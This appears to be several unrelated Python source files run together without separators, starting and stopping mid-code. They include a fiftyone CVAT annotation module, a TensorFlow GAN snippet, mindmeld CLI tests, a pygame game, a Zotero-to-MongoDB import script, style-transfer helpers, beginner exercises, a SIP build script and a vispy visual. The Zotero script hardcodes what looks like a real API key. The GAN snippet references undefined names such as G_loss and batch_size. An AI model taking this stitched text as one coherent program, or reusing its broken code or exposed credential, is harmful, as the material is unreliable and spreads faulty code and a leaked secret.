detection.attributes: supported_attrs = ( fol.BooleanAttribute, fol.CategoricalAttribute, fol.NumericAttribute, ) attributes = [] for name, attr in detection.attributes.items(): if name == "outside": outside = attr.value elif name == "occluded": occluded = attr.value elif name == "keyframe": keyframe = attr.value elif isinstance(attr, supported_attrs): attributes.append(CVATAttribute(name, attr.value)) else: attributes = None return cls( frame_number, label, xtl, ytl, xbr, ybr, outside=outside, occluded=occluded, keyframe=keyframe, attributes=attributes, ) @classmethod def from_box_dict(cls, label, d): """Creates a :class:`CVATVideoBox` from a ``<box>`` tag of a CVAT video annotation XML file. Args: label: the object label d: a dict representation of a ``<box>`` tag Returns: a :class:`CVATVideoBox` """ frame = int(d["@frame"]) xtl = int(round(float(d["@xtl"]))) ytl = int(round(float(d["@ytl"]))) xbr = int(round(float(d["@xbr"]))) ybr = int(round(float(d["@ybr"]))) outside = d.get("@outside", None) if outside is not None: outside = bool(int(outside)) occluded = d.get("@occluded", None) if occluded is not None: occluded = bool(int(occluded)) keyframe = d.get("@keyframe", None) if keyframe is not None: keyframe = bool(int(keyframe)) attributes = [] for attr in _ensure_list(d.get("attribute", [])): name = attr["@name"].lstrip("@") value = attr["#text"] try: value = float(value) except: pass attributes.append(CVATAttribute(name, value)) return cls( frame, label, xtl, ytl, xbr, ybr, outside=outside, occluded=occluded, keyframe=keyframe, attributes=attributes, ) class CVATAttribute(object): """An attribute in CVAT image format. Args: name: the attribute name value: the attribute value """ def __init__(self, name, value): self.name = name self.value = value def to_eta_attribute(self): """Returns an ``eta.core.data.Attribute`` representation of the attribute. Returns: an ``eta.core.data.Attribute`` """ if isinstance(self.value, bool): return etad.BooleanAttribute(self.name, self.value) if etau.is_numeric(self.value): return etad.NumericAttribute(self.name, self.value) return etad.CategoricalAttribute(self.name, self.value) def to_attribute(self): """Returns a :class:`fiftyone.core.labels.Attribute` representation of the attribute. Returns: a :class:`fiftyone.core.labels.Attribute` """ if isinstance(self.value, bool): return fol.BooleanAttribute(value=self.value) if etau.is_numeric(self.value): return fol.NumericAttribute(value=self.value) return fol.CategoricalAttribute(value=self.value) class CVATImageAnnotationWriter(object): """Class for writing annotations in CVAT image format. See :class:`fiftyone.types.dataset_types.CVATImageDataset` for format details. """ def __init__(self): environment = jinja2.Environment( loader=jinja2.FileSystemLoader(foc.RESOURCES_DIR), trim_blocks=True, lstrip_blocks=True, ) self.template = environment.get_template( "cvat_image_annotation_template.xml" ) def write( self, cvat_task_labels, cvat_images, xml_path, id=None, name=None ): """Writes the annotations to disk. Args: cvat_task_labels: a :class:`CVATTaskLabels` instance cvat_images: a list of :class:`CVATImage` instances xml_path: the path to write the annotations XML file id (None): an ID for the task name (None): a name for the task """ now = datetime.now().isoformat() xml_str = self.template.render( { "id": id if id is not None else "", "name": name if name is not None else "", "size": len(cvat_images), "created": now, "updated": now, "labels": cvat_task_labels.labels, "dumped": now, "images": cvat_images, } ) etau.write_file(xml_str, xml_path) class CVATVideoAnnotationWriter(object): """Class for writing annotations in CVAT video format. See :class:`fiftyone.types.dataset_types.CVATVideoDataset` for format details. """ def __init__(self): environment = jinja2.Environment( loader=jinja2.FileSystemLoader(foc.RESOURCES_DIR), trim_blocks=True, lstrip_blocks=True, ) self.template = environment.get_template( "cvat_video_interpolation_template.xml" ) def write( self, cvat_task_labels, cvat_tracks, metadata, xml_path, id=None, name=None, ): """Writes the annotations to disk. Args: cvat_task_labels: a :class:`CVATTaskLabels` instance cvat_tracks: a list of :class:`CVATTrack` instances metadata: the :class:`fiftyone.core.metadata.VideoMetadata` instance for the video xml_path: the path to write the annotations XML file id (None): an ID for the task name (None): a name for the task """ now = datetime.now().isoformat() xml_str = self.template.render( { "id": id if id is not None else "", "name": name if name is not None else "", "size": metadata.total_frame_count, "created": now, "updated": now, "width": metadata.frame_width, "height": metadata.frame_height, "labels": cvat_task_labels.labels, "dumped": now, "tracks": cvat_tracks, } ) etau.write_file(xml_str, xml_path) def load_cvat_image_annotations(xml_path): """Loads the CVAT image annotations from the given XML file. See :class:`fiftyone.types.dataset_types.CVATImageDataset` for format details. Args: xml_path: the path to the annotations XML file Returns: a tuple of - info: a dict of dataset info - cvat_task_labels: a :class:`CVATTaskLabels` instance - cvat_images: a list of :class:`CVATImage` instances """ d = fou.load_xml_as_json_dict(xml_path) annotations = d.get("annotations", {}) # Verify version version = annotations.get("version", None) if version is None: logger.warning("No version tag found; assuming version 1.1") elif version != "1.1": logger.warning( "Only version 1.1 is explicitly supported; found %s. Trying to " "load assuming version 1.1 format", version, ) # Load meta meta = annotations.get("meta", {}) # Load task labels task = meta.get("task", {}) labels_dict = task.get("labels", {}) cvat_task_labels = CVATTaskLabels.from_labels_dict(labels_dict) # Load annotations image_dicts = _ensure_list(annotations.get("image", [])) cvat_images = [CVATImage.from_image_dict(id) for id in image_dicts] # Load dataset info info = {"task_labels": cvat_task_labels.labels} if "created" in task: info["created"] = task["created"] if "updated" in task: info["updated"] = task["updated"] if "dumped" in meta: info["dumped"] = meta["dumped"] return info, cvat_task_labels, cvat_images def load_cvat_video_annotations(xml_path): """Loads the CVAT video annotations from the given XML file. See :class:`fiftyone.types.dataset_types.CVATVideoDataset` for format details. Args: xml_path: the path to the annotations XML file Returns: a tuple of - info: a dict of dataset info - cvat_task_labels: a :class:`CVATTaskLabels` instance - cvat_tracks: a list of :class:`CVATTrack` instances """ d = fou.load_xml_as_json_dict(xml_path) annotations = d.get("annotations", {}) # Verify version version = annotations.get("version", None) if version is None: logger.warning("No version tag found; assuming version 1.1") elif version != "1.1": logger.warning( "Only version 1.1 is explicitly supported; found %s. Trying to " "load assuming version 1.1 format", version, ) # Load meta meta = annotations.get("meta", {}) # Load task labels task = meta.get("task", {}) labels_dict = task.get("labels", {}) cvat_task_labels = CVATTaskLabels.from_labels_dict(labels_dict) # Load annotations track_dicts = _ensure_list(annotations.get("track", [])) if track_dicts: original_size = task["original_size"] frame_size = ( int(original_size["width"]), int(original_size["height"]), ) cvat_tracks = [ CVATTrack.from_track_dict(td, frame_size) for td in track_dicts ] else: cvat_tracks = [] # Load dataset info info = {"task_labels": cvat_task_labels.labels} if "created" in task: info["created"] = task["created"] if "updated" in task: info["updated"] = task["updated"] if "dumped" in meta: info["dumped"] = meta["dumped"] return info, cvat_task_labels, cvat_tracks def _cvat_tracks_to_frames(cvat_tracks, objects_field): frames = {} for cvat_track in cvat_tracks: detections = cvat_track.to_detections() for frame_number, detection in detections.items(): if frame_number not in frames: frame = fof.Frame() frame[objects_field] = fol.Detections() frames[frame_number] = frame else: frame = frames[frame_number] frame[objects_field].detections.append(detection) return frames def _frames_to_cvat_tracks(frames, frame_size): no_index_map = defaultdict(list) detections_map = defaultdict(dict) def process_detection(detection, frame_number): if detection.index is not None: detections_map[detection.index][frame_number] = detection else: no_index_map[frame_number].append(detection) # Convert from per-frame to per-object tracks for frame_number, frame in frames.items(): for _, value in frame.iter_fields(): if isinstance(value, fol.Detection): process_detection(value, frame_number) elif isinstance(value, fol.Detections): for detection in value.detections: process_detection(detection, frame_number) cvat_tracks = [] # Generate object tracks max_index = -1 for index in sorted(detections_map): max_index = max(index, max_index) detections = detections_map[index] cvat_track = CVATTrack.from_detections(index, detections, frame_size) cvat_tracks.append(cvat_track) # Generate single tracks for detections with no `index` index = max_index for frame_number, detections in no_index_map.items(): for detection in detections: index += 1 cvat_track = CVATTrack.from_detections( index, {frame_number: detection}, frame_size ) cvat_tracks.append(cvat_track) return cvat_tracks def _ensure_list(value): if value is None: return [] if isinstance(value, list): return value return [value]
#take user inputs for time period timePeriod = input("Time Period : ") timePeriod = float(timePeriod) #take user inputs for number of times noOfTimes = input("Number of times : ") noOfTimes = float(noOfTimes) #take user inputs for peak time feature peakTime = input("Peak time (Y /N) : ") while peakTime != "Y" and peakTime != "y" and peakTime != "N" and peakTime != "n": print("Invalid Input! Try again!! " + peakTime) peakTime = input("Peak time (Y /N) : ") #calculate basic price if timePeriod > 60: total = 25000 * noOfTimes elif timePeriod >= 45: total = 12000 * noOfTimes else: total = 7500 * noOfTimes #calculate and add extra fee for peak time if peakTime == "Y" or peakTime == "y": total = total * 120 / 100 #print output print("Total amount to be paid : " + str(total))
import tensorflow as tf def discriminator(x): with tf.variable_scope("discriminator"): fc1 = tf.layers.dense(inputs=x, units=256, activation=tf.nn.leaky_relu) fc2 = tf.layers.dense(inputs=fc1, units=256, activation=tf.nn.leaky_relu) logits = tf.layers.dense(inputs=fc2, units=1) return logits def generator(z): with tf.variable_scope("generator"): fc1 = tf.layers.dense(inputs=z, units=1024, activation=tf.nn.relu) fc2 = tf.layers.dense(inputs=fc1, units=1024, activation=tf.nn.relu) img = tf.layers.dense(inputs=fc2, units=784, activation=tf.nn.tanh) return img def gan_loss(logits_real, logits_fake): # Target label vectors for generator and discriminator losses. true_labels = tf.ones_like(logits_real) fake_labels = tf.zeros_like(logits_fake) # DISCRIMINATOR loss has 2 parts: how well it classifies real images and how well it # classifies fake images. real_image_loss = tf.nn.sigmoid_cross_entropy_with_logits(logits=logits_real, labels=true_labels) fake_image_loss = tf.nn.sigmoid_cross_entropy_with_logits(logits=logits_fake, labels=fake_labels) # Combine and average losses over the batch discriminator_loss = tf.reduce_mean(real_image_loss + fake_image_loss) # GENERATOR is trying to make the discriminator output 1 for all its images. # So we use our target label vector of ones for computing generator loss. generator_loss = tf.nn.sigmoid_cross_entropy_with_logits(logits=logits_fake, labels=true_labels) # Average generator loss over the batch. generator_loss = tf.reduce_mean(G_loss) return discriminator_loss , generator_loss discriminator_solver = tf.train.AdamOptimizer(learning_rate=0.001, beta1=0.5) generator_solver = tf.train.AdamOptimizer(learning_rate=0.001, beta1=0.5) z = tf.random_uniform(maxval=1,minval=-1,shape=[batch_size, dim]) generator_sample = generator(z) with tf.variable_scope("") as scope: logits_real = discriminator(x) # Re-use discriminator weights scope.reuse_variables() logits_fake = discriminator(generator_sample) discriminator_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, 'discriminator') generator_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, 'generator') discriminator_loss, generator_loss = gan_loss(logits_real, logits_fake) # Training steps discriminator_train_step = discriminator_solver.minimize(discriminator_loss, var_list=discriminator_vars ) generator_train_step = generator_solver.minimize(generator_loss , var_list=generator_vars ) """TRAINING LOOP GOES HERE"""
import os from unittest.mock import patch from click.testing import CliRunner from mindmeld import cli from mindmeld.cli import clean, num_parser def test_num_parse_already_running(mocker): runner = CliRunner() with patch("logging.Logger.info") as mocking: mocker.patch.object(cli, "_get_duckling_pid", return_value=[123]) runner.invoke(num_parser, ["--start"]) mocking.assert_any_call("Numerical parser running, PID %s", 123) def test_num_parse_not_running(mocker): runner = CliRunner() with patch("logging.Logger.warning") as mocking: mocker.patch.object(cli, "_get_duckling_pid", return_value=None) mocker.patch.object(cli, "_find_duckling_os_executable", return_value=None) runner.invoke(num_parser, ["--start"]) mocking.assert_any_call( "OS is incompatible with duckling executable. Use docker to install duckling." ) def test_clean_query_cache(mocker, fake_app): with patch("logging.Logger.info") as mocking: runner = CliRunner() mocker.patch.object(os.path, "exists", return_value=False) runner.invoke(clean, ["--query-cache"], obj={"app": fake_app}) mocking.assert_any_call("Query cache deleted") def test_clean_model_cache(mocker, fake_app): with patch("logging.Logger.warning") as mocking: runner = CliRunner() mocker.patch.object(os.path, "exists", return_value=True) mocker.patch.object(os, "listdir", return_value=["123"]) runner.invoke(clean, ["--model-cache"], obj={"app": fake_app}) mocking.assert_any_call( "Expected timestamped folder. " "Ignoring the file %s.", "123/.generated/cached_models/123", )
import sys import pygame import random SCREEN = pygame.display.set_mode((640, 480)) class Missile(pygame.sprite.Sprite): def __init__(self): super().__init__() self.image = pygame.image.load('images/missile/missile.png').convert_alpha() self.rect = self.image.get_rect() x, y = SCREEN.get_size() self.rect.center = (random.randint(0, x), y) # 델타 y 값 지정 self.dy = random.randint(5, 15) def update(self): self.rect.centery = self.rect.centery - self.dy if self.rect.top < 0: self.image = pygame.image.load('images/missile/bang.png').convert_alpha() self.rect.top = 0 class FireMissile: def __init__(self): pygame.init() pygame.display.set_caption("Fire Missile_미사일 발사 게임") self.background = pygame.Surface(SCREEN.get_size()) self.background.fill(pygame.Color('black')) SCREEN.blit(self.background, (0, 0)) self.missile_group = pygame.sprite.Group() for n in range(3): self.missile_group.add(Missile()) self.clock = pygame.time.Clock() def render(self): self.missile_group.clear(SCREEN, self.background) #화면 지우고 업데이트 > 일반적인 방법 self.missile_group.update() self.missile_group.draw(SCREEN) pygame.display.flip() def fire(self): fps = 100 # 3개 미사일 추가 # for num in range(3): # self.missile_group.add(Missile()) keep_going = True while keep_going: self.clock.tick(fps) for event in pygame.event.get(): if event.type == pygame.QUIT: keep_going = False # pygame.quit() # break for missile in self.missile_group.sprites(): if missile.rect.top == 0: self.missile_group.remove(missile) self.missile_group.add(Missile()) self.render() sys.exit(0) if __name__ == '__main__': game = FireMissile() game.fire()
import pymongo from bson.objectid import ObjectId from pyzotero import zotero from getpass import getpass from sys import argv if __name__ == '__main__': #passwd = getpass ("Password: ") mongo = pymongo.Connection ('localhost', 27017)['refs'] #test #mongo = pymongo.Connection('localhost', 3002)['meteor'] #mongo.authenticate('skapes', passwd) library_id= '126319' library_type='group' api_key = 'TwxmBGN2hCcTrKePkXPaX9RI' zot = zotero.Zotero(library_id, library_type, api_key) items = zot.all_top () for item in items: mongo.references.insert (item)
""" PyTorch implementation of paper "A Neural Algorithm of Artistic Style". Helper functions. @author: Zhenye Na @references: [1] Leon A. Gatys, Alexander S. Ecker, Matthias Bethge A Neural Algorithm of Artistic Style. arXiv:1508.06576 """ import os import torch import torch.nn as nn from PIL import Image import torchvision.transforms as transforms # desired size of the output image imsize = 512 if torch.cuda.is_available() else 128 # use small size if no gpu loader = transforms.Compose([ transforms.Resize(imsize), transforms.ToTensor() ]) # reconvert into PIL image unloader = transforms.ToPILImage() def image_loader(image_name): """Image loader.""" image = Image.open(image_name) # fake batch dimension required to fit network's input dimensions image = loader(image).unsqueeze(0) return image def save_image(tensor, path): """Save a single image.""" image = tensor.cpu().clone() image = image.squeeze(0) image = unloader(image) image.save(os.path.join(path, "out.jpg")) # create a module to normalize input image so we can easily put it in a # nn.Sequential class Normalization(nn.Module): """Normalize input image.""" def __init__(self, mean, std): """Initialization.""" super(Normalization, self).__init__() # .view the mean and std to make them [C x 1 x 1] so that they can # directly work with image Tensor of shape [B x C x H x W]. # B is batch size. C is number of channels. H is height and W is width. self.mean = torch.tensor(mean).view(-1, 1, 1) self.std = torch.tensor(std).view(-1, 1, 1) def forward(self, img): """Forward pass.""" return (img - self.mean) / self.std
##******** 1- QUICK PYTHON EXERCISES FOR DATA SCIENCE / PART 1 ##********* #1 What is virtual environment ? # In short [*] : Creating a virtual environment to isolate projects with different needs. # Different versions of libraries, packages or modules can be kept. # They can work without affecting each other. # 1.1 FORMAL DEFINITION : '''The venv module provides support for creating lightweight “virtual environments” with their own site directories, optionally isolated from system site directories. Each virtual environment has its own Python binary (which matches the version of the binary that was used to create this environment) and can have its own independent set of installed Python packages in its site directories.[1]''' #2 What is Conda ? # In short it is a tool for creating Virtual Environment and manage it. You can also make dependency management # 2.1 FORMAL DEFINITION : ''' Package, dependency and environment management for any language—Python, R, Ruby, Lua, Scala, Java, JavaScript, C/ C++, FORTRAN, and more. Conda is an open source package management system and environment management system that runs on Windows, macOS and Linux. Conda quickly installs, runs and updates packages and their dependencies. Conda easily creates, saves, loads and switches between environments on your local computer. It was created for Python programs, but it can package and distribute software for any language. [2]''' #3 What is Dependency Management ? # In short it is as it's name Dependency and Package management. # (Package like Numpy, Pandas etc... ) so that is, the management of these and the tools # that manage the dependencies of these packages. # 3.1 FORMAL DEFINITION : ''' Conda as a package manager helps you find and install packages. If you need a package that requires a different version of Python, you do not need to switch to a different environment manager, because conda is also an environment manager. With just a few commands, you can set up a totally separate environment to run that different version of Python, while continuing to run your usual version of Python in your normal environment. [3] ''' #4 Use string format and print the personnel "no & name" personnel = {"name": "John", "no": 63323} "name : {} , no : {}".format(personnel["name"],personnel["no"]) #5 Print the "name" and "no" with fstring. name = "Connor" no = 63324 f"Name: {name} , No: {no}" #6 Please divide the sentence below with the split() sentence=" Hello Data Science World " sentence.split() #7 Please remove the "H" letters and spaces in the sentences below by using strip() with two separate operations. sentence=" Hello Data Science World " sentence.strip() sentence2="Hello Data Science WorldH".strip("H") sentence2.strip("H") #8 Take a number from the user by input function. Assign the number to the no variable. Multiple by 8 and #divede by 2 no= int(input()) no*8/2 #9 Create an employee list. Use dir() to see the possible processes that you can do . Use append() to add # employee name "Ulas" to the list and then apply pop() method to remove the third element. employees = ["John","Connor","Sarah","Arnold"] dir("John") employees.append("Ulas") employees employees.pop(3) employees #10 Create a tuple with 6 element and print the first 5 of it. my_tuple=(1,2,"3",4,'5',6) my_tuple[:5] #11 WHAT IS ENUMERATE ? # In short [*] : Enumeric automatically generates an index, ie counter, in a loop. # Thus, the elements of a list or any object to be visited in it are automatically indexed. # This is a life saver to match, track and transact on it. # 11.1 FORMAL DEFINITION : """In computer programming, an enumerated type (also called enumeration, enum, or factor in the R programming language, and a categorical variable in statistics) is a data type consisting of a set of named values called elements, members, enumeral, or enumerators of the type.[4]""" # 11.2 ADDITIONAL DEFINITIONS AND USAGE : # # # The enumerate() method creates a counter that tracks how many iterations have occurred in a loop. # enumerate() is built-in to Python, so we do not have to import any libraries to use # the enumerate() method [5] # # The enumerate() function takes a collection (e.g. a tuple) and returns it as an enumerate object. # The enumerate() function adds a counter as the key of the enumerate object.[6] #12 Write a program with enumerate that gives the output below from the list employee = ["Ulas", "John", "Connor", "Sarah"] '''REQUIRED OUTPUT : 0 Ulas 1 John 2 Connor 3 Sarah ''' for index,name in enumerate(employee): print(index,name) #13 Write a program with enumerate that gives the output below from the list. '''REQUIRED OUTPUT : 1 Ulas 2 John 3 Connor 4 Sarah''' employee = ["Ulas", "John", "Connor", "Sarah"] for index, name in enumerate(employee,1): print(index, name) #14 Create 2 groups from employee list. If index is even assign it to the group X otherwise group Y. # Use enumeration X=[] Y=[] for index, name in enumerate(employee,1): if index%2 == 0: X.append(name) else: Y.append(name) #15 Create a functional solution for question 14 def employeeGroups (employee): empGroups=[[],[]] for index, name in enumerate(employee, 1): if index % 2 == 0: empGroups[0].append(name) else: empGroups[1].append(name) print(empGroups) employeeGroups(employee) #16 Write a modifier function which takes a sentence as an argument . If index is even turn it to lower case # otherwise to upper case. def modifier(string): modSentence= "" for i in range(len(string)): if i%2==0: modSentence+=string[i].lower() else: modSentence+=string[i].upper() print(modSentence) modifier("Hello World") #17 What is Map Function for ? # In short: Map means to matching. It provides the possibility to apply # a certain function to each element of an iterative object without writing a loop. # 17.1 FORMAL DEFINITION : ''' Make an iterator that computes the function using arguments from each of the iterables. Stops when the shortest iterable is exhausted.[7] ''' # 17.2 ADDITIONAL DEFINITIONS AND USAGE : # # # map(function, iterable, ...) # Apply function to every item of iterable and return a list of the results. # If additional iterable arguments are passed, function must take that many arguments # and is applied to the items from all iterables in parallel.[8] #18 Please write a new_prices function which modifies the prices by additional 30 % . # Then map this function into the list. prices = [10000, 20000, 30000, 40000, 50000] def new_prices(p): return p*30/100 + p list(map(new_prices,prices)) #19 For question 8 now apply lambda with map function. Don't write a new_prices function . # Just write it's features #with lambda function. list(map(lambda x: x+x*30/100,prices)) #20 Please filter the num_list's even numbers with lambda in Filter() function. num_list = [0,1,11, 22, 33, 44, 55, 66, 77, 88, 99, 100] list(filter(lambda x: x%2==0,num_list)) #21 We would like to make summation in the num_list numbers with Reduce fuction. # Please write the necescary code. from functools import reduce reduce(lambda x,y: x+y,num_list) # 21.1 : Please explain what Reduce () function. # In short Reduce() function just makes reduction. # FORMAL DEFINITION : """ def reduce(function, sequence, initial=_initial_missing): reduce(function, sequence[, initial]) -> value Apply a function of two arguments cumulatively to the items of a sequence, from left to right, so as to reduce the sequence to a single value. For example, reduce(lambda x, y: x+y, [1, 2, 3, 4, 5]) calculates ((((1+2)+3)+4)+5). If initial is present, it is placed before the items of the sequence in the calculation, and serves as a default when the sequence is empty. [9] """ #22 What is list comprehension for ? # In short It is a list operation that allows the outputs to remain as a list with a faster effort # as a result of a series of operations. # FORMAL DEFINITIONS : '''List comprehension offers a shorter syntax when you want to create a new list based on the values of an existing list.[10]''' #List comprehensions provide a concise way to create lists. Common applications are to make new lists # where each element is the result of some operations applied to each member of another sequence # or iterable, or to create a subsequence of those elements that satisfy a certain condition. [11] #23 Please multiple every price in price list by 3 and hold them in the list compherension. prices = [10000, 20000, 30000, 40000, 50000] [i*3 for i in prices ] #23.1- At that time If prices are lower than 30000 multiple by 3 . Use list compherension [i*3 for i in prices if i<30000 ] #23.2- At this time If prices are lower than 30000 multiple by 3 . otherwise apply # new_prices() . Use list compherension [i * 3 if i < 30000 else new_prices(i) for i in prices ] #23.3- At this time If prices are lower than 30000 multiple by 3 and apply new_prices(). Otherwise only apply # new_prices() . Use list compherension [3*new_prices(i) if i < 30000 else new_prices(i) for i in prices ] #24 When to use the list comprehensions ? # In short when we want to processes easier # FORMAL DEFINITIONS : ''' List comprehensions provide us with a simple way to create a list based on some iterable. # During the creation, elements from the iterable can be conditionally included in the new list and transformed as needed.[12] ''' #25 There are 2 list exist. Use List comprehension.Loop in "employee" list and create a new list. # if the names in "employee" exist in the "non_employee" list write the first letters of them # in lower case to the new list. Add the other names in capital case to the list. employee = ["Ulas", "John", "Connor", "Sarah"] non_employee = ["John", "Sarah"] [i.lower() if i in non_employee else i for i in employee] #26 What is Dictionary Comprehensions {} and when to use ? # In short it is a structure that keep keys and values in pairs. # We use "{}" When we want to keep key and value # operation results as a dictionary . # FORMAL DEFINITIONS : ''' Returns a dictionary based on existing iterables.[13]''' #27 What happens when key(),value(),items() functions used sequentially on dictionary ? dictionary = {'one': 1, 'two': 2, 'three': 3, 'four': 4} dictionary.values() dictionary.keys() dictionary.items() #28 Use DC (Dictionary Comprehension) and take the second power of all values in "dictionary". { keys:values**2 for keys,values in dictionary.items() } #28.1 Use DC (Dictionary Comprehension) and turn to the capital case of all keys in "dictionary". { keys.upper():values for keys,values in dictionary.items() } #28.2 Double the keys existing values { keys*2:values for keys,values in dictionary.items() } #29 Print the even numbers with Dictionary Comprehension as key and their square as value numbers = range(10) { keys: keys**2 for keys in numbers if keys%2==0 } #SOURCES : #[*]: All information started with `In short` : https://www.veribilimiokulu.com - Mr Mustafa Vahit Keskin ( Data Scientist ) - DSMLBC4 (2021) #[1]: https://docs.python.org/3/library/venv.html #[2]: https://docs.conda.io/en/master/ #[3]: https://docs.conda.io/en/master/ #[4] https://en.wikipedia.org/wiki/Enumerated_type#:~:text=From%20Wikipedia%2C%20the%20free%20encyclopedia,or%20enumerators%20of%20the%20type. #[5]: https://careerkarma.com/blog/python-enumerate/ #[6]: https://www.w3schools.com/python/ref_func_enumerate.asp #[7]: https://docs.python.org/3.8/library/functions.html#map & jetbrains help documentation #[8]: https://stackoverflow.com/questions/10973766/understanding-the-map-function #[9]: https://docs.python.org/3.8/library/functools.html#functools.reduce #[10]: https://www.w3schools.com/python/python_lists_comprehension.asp #[11]: https://docs.python.org/3/tutorial/datastructures.html #[12]: https://towardsdatascience.com/python-basics-list-comprehensions-631278f22c40 #[13]: https://python-reference.readthedocs.io/en/latest/docs/comprehensions/dict_comprehension.html
import os import sipconfig #CAS: this is a win32 version, specific to my machine, provided for example. # The name of the SIP build file generated by SIP and used by the build # system. build_file = "blist.sbf" # Get the SIP configuration information. config = sipconfig.Configuration() # Run SIP to generate the code. os.system(" ".join([config.sip_bin, "-c", ".", "-b", build_file, "sip/blist.sip"])) # Create the Makefile. makefile = sipconfig.SIPModuleMakefile(config, build_file) # Add the library we are wrapping. The name doesn't include any platform # specific prefixes or extensions (e.g. the "lib" prefix on UNIX, or the # ".dll" extension on Windows). makefile.extra_libs = ['buddylist'] makefile.extra_include_dirs.append(r'C:\Users\Christopher\workspace\boost_1_42_0') makefile.extra_cxxflags.append('//EHsc') makefile.extra_lib_dirs.extend([r'C:\Users\Christopher\workspace\digsby\ext\src\BuddyList\msvc2008\Release']) makefile._build['objects'] += " PythonInterface.obj FileUtils.obj" makefile._build['sources'] += " PythonInterface.cpp FileUtils.cpp" # Generate the Makefile itself. makefile.generate()
# -*- coding: utf-8 -*- # ----------------------------------------------------------------------------- # Code heavily inspired by: # Copyright (c) Vispy Development Team. All Rights Reserved. # Distributed under the (new) BSD License. See LICENSE.txt for more info. # # Modified by: # author: John Bass # email: john.bobzwik@gmail.com # license: MIT # Please feel free to use and modify this, but keep the above information. Thanks! # ----------------------------------------------------------------------------- import numpy as np from vispy.geometry import create_box from vispy.visuals.mesh import MeshVisual from vispy.visuals.visual import CompoundVisual from vispy.scene.visuals import create_visual_node from .varvismesh import VarVisMeshVisual class BoxMarkersVisual(CompoundVisual): """Visual that displays a box. Parameters ---------- point_coords : array_like Marker coordinates width : float Box width. height : float Box height. depth : float Box depth. width_segments : int Box segments count along the width. height_segments : float Box segments count along the height. depth_segments : float Box segments count along the depth. planes: array_like Any combination of ``{'-x', '+x', '-y', '+y', '-z', '+z'}`` Included planes in the box construction. vertex_colors : ndarray Same as for `MeshVisual` class. See `create_plane` for vertex ordering. face_colors : ndarray Same as for `MeshVisual` class. See `create_plane` for vertex ordering. color : Color The `Color` to use when drawing the cube faces. edge_color : tuple or Color The `Color` to use when drawing the cube edges. If `None`, then no cube edges are drawn. """ def __init__(self, point_coords=np.array([0,0,0]), width=1, height=1, depth=1, width_segments=1, height_segments=1, depth_segments=1, planes=None, vertex_colors=None, face_colors=None, color=(0.5, 0.5, 1, 1), edge_color=None, variable_vis=False, **kwargs): self.point_coords = point_coords self.nb_points = point_coords.shape[0] self.width = width self.height = height self.depth = depth self.color = color self._variable_vis = variable_vis # Create a unit box width_box = 1 height_box = 1 depth_box = 1 scale = np.array([width, height, depth]) self.vertices_box, self.filled_indices_box, self.outline_indices_box = create_box( width_box, height_box, depth_box, width_segments, height_segments, depth_segments, planes) # Store number of vertices, filled_indices and outline_indices per box self.nb_v = self.vertices_box.shape[0] self.nb_fi = self.filled_indices_box.shape[0] self.nb_oi = self.outline_indices_box.shape[0] # Create empty arrays for vertices, filled_indices and outline_indices vertices = np.zeros(self.nb_v*point_coords.shape[0], [('position', np.float32, 3), ('texcoord', np.float32, 2), ('normal', np.float32, 3), ('color', np.float32, 4)]) filled_indices = np.zeros([self.nb_fi*point_coords.shape[0], 3], np.uint32) outline_indices = np.zeros([self.nb_oi*point_coords.shape[0], 2], np.uint32) if self.variable_vis: # "box_to_face" and "box_to_outl" represent array of faces and # outlines indexes associated to each box box_to_face = np.zeros([point_coords.shape[0], self.nb_fi], np.uint32) box_to_outl = np.zeros([point_coords.shape[0], self.nb_oi], np.uint32) # Iterate for every marker for i in range(self.nb_points): idx_v_start = self.nb_v*i idx_v_end = self.nb_v*(i+1) idx_fi_start = self.nb_fi*i idx_fi_end = self.nb_fi*(i+1) idx_oi_start = self.nb_oi*i idx_oi_end = self.nb_oi*(i+1) # Scale and translate unit box vertices[idx_v_start:idx_v_end]['position'] = self.vertices_box['position']*scale + point_coords[i] filled_indices[idx_fi_start:idx_fi_end] = self.filled_indices_box + idx_v_start outline_indices[idx_oi_start:idx_oi_end] = self.outline_indices_box + idx_v_start if self.variable_vis: box_to_face[i,:] = np.arange(idx_fi_start,idx_fi_end) box_to_outl[i,:] = np.arange(idx_oi_start,idx_oi_end) if self.variable_vis: self.box_to_face = box_to_face self.box_to_outl = box_to_outl self._visible_boxes = np.arange(self.nb_points) # Create MeshVisual for faces and borders self._mesh = VarVisMeshVisual(self.nb_points, vertices['position'], filled_indices, vertex_colors, face_colors, color, variable_vis=variable_vis) if edge_color: self._border = VarVisMeshVisual(self.nb_points, vertices['position'], outline_indices, color=edge_color, mode='lines', variable_vis=variable_vis) else: self._border = VarVisMeshVisual(self.nb_points) CompoundVisual.__init__(self, [self._mesh, self._border], **kwargs) self.mesh.set_gl_state(polygon_offset_fill=True, polygon_offset=(1, 1), depth_test=True) self.freeze() def set_visible_boxes(self, idx_box_vis): """Set which boxes are visible. Parameters ---------- idx_box_vis : Array like Index array of ALL visible boxes of point_coords """ if not self.variable_vis: raise ValueError('Variable visibility must be enabled via "variable_vis"') # Find which boxes are now visible that weren't last update of 'self.visible_boxes', # and vice-versa newbox_vis = np.setdiff1d(idx_box_vis, self.visible_boxes) oldbox_vis = np.setdiff1d(self.visible_boxes, idx_box_vis) # Get the new visible vertices indexes for the faces (mesh) and outlines (border) # and the new invisible vertices indexes idx_face_vis = np.ravel(self.box_to_face[newbox_vis]) idx_outl_vis = np.ravel(self.box_to_outl[newbox_vis]) idx_face_invis = np.ravel(self.box_to_face[oldbox_vis]) idx_outl_invis = np.ravel(self.box_to_outl[oldbox_vis]) # Update mesh visibility bool array self.mesh.set_visible_faces(idx_face_vis) self.mesh.set_invisible_faces(idx_face_invis) self.mesh.update_vis_buffer() # Update border visibility bool array self.border.set_visible_faces(idx_outl_vis) self.border.set_invisible_faces(idx_outl_invis) self.border.update_vis_buffer() # Update 'self.visible_boxes' self.visible_boxes = idx_box_vis def set_data(self, point_coords=None, width=None, height=None, depth=None, vertex_colors=None, face_colors=None, color=None, edge_color=None): if point_coords is None: point_coords = self.point_coords else: self.point_coords = point_coords if width is None: width = self.width else: self.width = width if height is None: height = self.height else: self.height = height if depth is None: depth = self.depth else: self.depth = depth if color is None: color = self.color else: self.color = color self.nb_points = point_coords.shape[0] # Create empty arrays for vertices, filled_indices and outline_indices vertices = np.zeros(self.nb_v*point_coords.shape[0], [('position', np.float32, 3), ('texcoord', np.float32, 2), ('normal', np.float32, 3), ('color', np.float32, 4)]) filled_indices = 